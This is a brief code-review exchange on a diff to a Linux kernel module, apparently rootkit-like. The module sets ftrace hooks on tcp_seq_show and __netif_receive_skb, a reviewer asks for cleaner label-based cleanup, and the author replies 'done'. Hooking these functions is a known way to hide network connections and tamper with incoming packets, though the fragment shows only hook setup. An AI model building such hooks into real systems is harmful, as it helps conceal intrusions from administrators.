hellomod.c

```diff
@@ -64,7 +78,15 @@ int init_module(void)
     if (res != 0){
         printk("failed to set tcp hook");
         undo_sys_hooks(sys_hooks, ARRAY_SIZE(sys_hooks));
-        return FAILED_TO_SET_SYSTEM_HOOKS;
+        return FAILED_TO_SET_FHOOK_HOOK;
+    }
+
+    res = set_ftrace_hook("__netif_receive_skb", &netif_fhook);
+    if (res != 0){
+        printk("failed to set netif hook");
+        undo_ftrace_hook(&tcp_seq_show_fhook);
```

Comment:
use labels and make your cleanup code cleaner

Reply:
done